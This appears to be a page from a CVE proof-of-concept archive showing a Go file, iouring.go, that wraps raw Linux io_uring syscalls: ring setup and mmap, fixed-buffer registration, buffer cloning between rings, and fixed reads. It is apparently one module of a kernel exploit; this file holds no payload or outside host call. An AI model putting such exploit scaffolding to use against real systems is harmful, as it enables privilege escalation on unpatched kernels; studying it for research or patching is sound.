5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / iouring.go GO
package main

import (
	"fmt"
	"sync/atomic"
	"syscall"
	"unsafe"
)

const (
	sysIoUringSetup    = 425
	sysIoUringEnter    = 426
	sysIoUringRegister = 427

	iORING_OFF_SQ_RING = 0
	iORING_OFF_CQ_RING = 0x8000000
	iORING_OFF_SQES    = 0x10000000

	iORING_REGISTER_BUFFERS      = 0
	iORING_REGISTER_CLONE_BUFFERS = 30

	iORING_OP_READ_FIXED = 4

	iORING_ENTER_GETEVENTS = 1
)

// io_uring_params layout (kernel ABI)
type iouringParams struct {
	sqEntries    uint32
	cqEntries    uint32
	flags        uint32
	sqThreadCPU  uint32
	sqThreadIdle uint32
	features     uint32
	wqFd         uint32
	resv         [3]uint32
	sqOff        sqringOffsets
	cqOff        cqringOffsets
}

type sqringOffsets struct {
	head        uint32
	tail        uint32
	ringMask    uint32
	ringEntries uint32
	flags       uint32
	dropped     uint32
	array       uint32
	resv1       uint32
	userAddr    uint64
}

type cqringOffsets struct {
	head        uint32
	tail        uint32
	ringMask    uint32
	ringEntries uint32
	overflow    uint32
	cqes        uint32
	flags       uint32
	resv1       uint32
	userAddr    uint64
}

// io_uring_sqe - 64 bytes
type iouringSQE struct {
	opcode   uint8
	flags    uint8
	ioprio   uint16
	fd       int32
	off      uint64
	addr     uint64
	length   uint32
	rwFlags  uint32
	userData uint64
	bufIndex uint16
	personality uint16
	spliceFdIn int32
	addr3    uint64
	pad2     uint64
}

// io_uring_cqe
type iouringCQE struct {
	userData uint64
	res      int32
	flags    uint32
}

// io_uring_clone_buffers
type iouringCloneBuffers struct {
	srcFd  uint32
	flags  uint32
	srcOff uint32
	dstOff uint32
	nr     uint32
	pad    [3]uint32
}

type uring struct {
	fd       int
	sqRing   uintptr
	cqRing   uintptr
	sqes     uintptr
	sqRingSz uintptr
	cqRingSz uintptr
	sqesSz   uintptr
	sqHead   *uint32
	sqTail   *uint32
	sqMask   *uint32
	sqArray  *uint32
	cqHead   *uint32
	cqTail   *uint32
	cqMask   *uint32
	cqes     *iouringCQE
}

func uringSetup(entries uint32) (*uring, error) {
	var p iouringParams
	fd, _, errno := syscall.Syscall(sysIoUringSetup, uintptr(entries), uintptr(unsafe.Pointer(&p)), 0)
	if errno != 0 {
		return nil, fmt.Errorf("io_uring_setup: %w", errno)
	}

	r := &uring{fd: int(fd)}

	r.sqRingSz = uintptr(p.sqOff.array) + uintptr(p.sqEntries)*4
	r.cqRingSz = uintptr(p.cqOff.cqes) + uintptr(p.cqEntries)*16
	r.sqesSz = uintptr(p.sqEntries) * 64

	sqRing, _, errno := syscall.Syscall6(syscall.SYS_MMAP, 0, r.sqRingSz,
		syscall.PROT_READ|syscall.PROT_WRITE,
		syscall.MAP_SHARED|syscall.MAP_POPULATE,
		uintptr(fd), iORING_OFF_SQ_RING)
	if errno != 0 {
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap sq_ring: %w", errno)
	}
	r.sqRing = sqRing

	cqRing, _, errno := syscall.Syscall6(syscall.SYS_MMAP, 0, r.cqRingSz,
		syscall.PROT_READ|syscall.PROT_WRITE,
		syscall.MAP_SHARED|syscall.MAP_POPULATE,
		uintptr(fd), iORING_OFF_CQ_RING)
	if errno != 0 {
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(sqRing))[:r.sqRingSz])
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap cq_ring: %w", errno)
	}
	r.cqRing = cqRing

	sqes, _, errno := syscall.Syscall6(syscall.SYS_MMAP, 0, r.sqesSz,
		syscall.PROT_READ|syscall.PROT_WRITE,
		syscall.MAP_SHARED|syscall.MAP_POPULATE,
		uintptr(fd), iORING_OFF_SQES)
	if errno != 0 {
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(cqRing))[:r.cqRingSz])
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(sqRing))[:r.sqRingSz])
		syscall.Close(int(fd))
		return nil, fmt.Errorf("mmap sqes: %w", errno)
	}
	r.sqes = sqes

	r.sqHead = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.head)))
	r.sqTail = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.tail)))
	r.sqMask = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.ringMask)))
	r.sqArray = (*uint32)(unsafe.Pointer(sqRing + uintptr(p.sqOff.array)))
	r.cqHead = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.head)))
	r.cqTail = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.tail)))
	r.cqMask = (*uint32)(unsafe.Pointer(cqRing + uintptr(p.cqOff.ringMask)))
	r.cqes = (*iouringCQE)(unsafe.Pointer(cqRing + uintptr(p.cqOff.cqes)))

	logf("io_uring fd=%d sq_ring@%#x(sz=%#x) cq_ring@%#x(sz=%#x) sqes@%#x(sz=%#x)",
		fd, sqRing, r.sqRingSz, cqRing, r.cqRingSz, sqes, r.sqesSz)
	return r, nil
}

func uringRegisterBuffers(r *uring, buf uintptr, length uintptr) error {
	iov := syscall.Iovec{Base: (*byte)(unsafe.Pointer(buf)), Len: uint64(length)}
	_, _, errno := syscall.Syscall6(sysIoUringRegister,
		uintptr(r.fd), iORING_REGISTER_BUFFERS,
		uintptr(unsafe.Pointer(&iov)), 1, 0, 0)
	if errno != 0 {
		return fmt.Errorf("io_uring_register buffers: %w", errno)
	}
	return nil
}

func uringCloneBuffers(dst, src *uring) error {
	arg := iouringCloneBuffers{srcFd: uint32(src.fd)}
	_, _, errno := syscall.Syscall6(sysIoUringRegister,
		uintptr(dst.fd), iORING_REGISTER_CLONE_BUFFERS,
		uintptr(unsafe.Pointer(&arg)), 1, 0, 0)
	if errno != 0 {
		return fmt.Errorf("io_uring clone buffers: %w", errno)
	}
	return nil
}

func uringSubmitReadFixed(r *uring, fileFd int, buf uintptr, length uint32) error {
	tail := atomic.LoadUint32(r.sqTail)
	idx := tail & *r.sqMask

	sqe := (*iouringSQE)(unsafe.Pointer(r.sqes + uintptr(idx)*64))
	*sqe = iouringSQE{}
	sqe.opcode = iORING_OP_READ_FIXED
	sqe.fd = int32(fileFd)
	sqe.off = 0
	sqe.addr = uint64(buf)
	sqe.length = length
	sqe.bufIndex = 0
	sqe.userData = 0x1234

	*(*uint32)(unsafe.Pointer(uintptr(unsafe.Pointer(r.sqArray)) + uintptr(idx)*4)) = idx
	atomic.StoreUint32(r.sqTail, tail+1)

	_, _, errno := syscall.Syscall6(sysIoUringEnter,
		uintptr(r.fd), 1, 1, iORING_ENTER_GETEVENTS, 0, 0)
	if errno != 0 {
		return fmt.Errorf("io_uring_enter: %w", errno)
	}
	return nil
}

func uringWaitCQE(r *uring) (int32, error) {
	head := atomic.LoadUint32(r.cqHead)
	for i := 0; i < 1000; i++ {
		tail := atomic.LoadUint32(r.cqTail)
		if head != tail {
			break
		}
		syscall.Nanosleep(&syscall.Timespec{Nsec: 1_000_000}, nil)
	}
	tail := atomic.LoadUint32(r.cqTail)
	if head == tail {
		return 0, fmt.Errorf("CQE timeout")
	}
	idx := head & *r.cqMask
	cqe := (*iouringCQE)(unsafe.Pointer(uintptr(unsafe.Pointer(r.cqes)) + uintptr(idx)*16))
	res := cqe.res
	atomic.StoreUint32(r.cqHead, head+1)
	return res, nil
}

func uringDestroy(r *uring) {
	if r == nil {
		return
	}
	if r.sqes != 0 {
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(r.sqes))[:r.sqesSz])
	}
	if r.cqRing != 0 {
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(r.cqRing))[:r.cqRingSz])
	}
	if r.sqRing != 0 {
		syscall.Munmap((*[1 << 30]byte)(unsafe.Pointer(r.sqRing))[:r.sqRingSz])
	}
	if r.fd >= 0 {
		syscall.Close(r.fd)
		r.fd = -1
	}
}